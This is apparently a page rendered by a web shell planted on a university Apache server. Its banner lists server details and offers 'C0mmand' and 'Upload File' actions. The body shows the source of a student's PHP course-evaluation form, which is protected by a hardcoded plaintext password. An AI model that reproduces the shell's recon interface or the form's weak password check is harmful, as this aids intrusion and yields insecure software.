Server IP : 172.16.15.8 / Your IP : 3.145.75.238 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/mekerns/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); if($_SESSION['psw']==NULL) { $pass=$_POST['pass']; $_SESSION['psw']=$pass; } else { $pass=$_SESSION['psw']; } if($pass!="project") print "Error"; else { ?> <CENTER> <h2> Evaluation Form </h2> <hr> <Font color=blue size=4> <Form action=a5insert.php method=post> Status: <input type=radio name=status value=Freshman> Freshman <input type=radio name=status value=Sophomore> Sophomore <input type=radio name=status value=Junior> Junior <input type=radio name=status value=Senior> Senior <P> Gender: <input type=radio name=gender value=Male> Male <input type=radio name=gender value=Female> Female Course: <input type=text size=8 name=course> <P> Did the professor use class time well? <input type=radio name=score1 value=0> Poor <input type=radio name=score1 value=1> Average <input type=radio name=score1 value=2> Good <P> <P> Was the information useful? <input type=radio name=score2 value=0> Poor <input type=radio name=score2 value=1> Average <input type=radio name=score2 value=2> Good <P> Did the professor teach the material well? <input type=radio name=score3 value=0> Poor <input type=radio name=score3 value=1> Average <input type=radio name=score3 value=2> Good <P> <HR> <input type=submit value=Submit> <input type=reset value=Reset> </Form> </CENTER> <?php } ?>